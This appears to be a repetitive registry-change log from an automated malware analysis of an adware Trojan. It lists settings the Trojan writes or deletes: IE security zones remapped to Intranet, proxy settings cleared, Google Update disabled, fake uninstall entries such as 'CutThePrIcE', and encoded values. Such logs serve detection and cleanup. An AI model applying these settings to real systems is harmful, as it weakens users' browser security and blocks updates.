[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 45 4D 19 EE 1D E8 01 14 18 04 96 41 37 81 7C"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutThePrIcE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
"InstallDate" = "20140701"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutThePrIcE"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C0 A7 2F 84 63 D6 00 93 4F 6E 60 95 C8 6E CE"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutaThePrice"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
"UpdateDefault" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutaThePrice"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 03 1F 34 56 16 EB 31 95 6F 64 32 0F 76 D4 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B5 29 E0 BD 96 28 92 29 8E B0 C9 E8 09 C8 F5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Web Protector Reliable Phishing Protection"
"DisplayName" = "Web Protector Reliable Phishing Protection"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process NybbleCrawler.xyz.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"CategoryName" = "NybbleCrawler"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"3c09c42b" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"
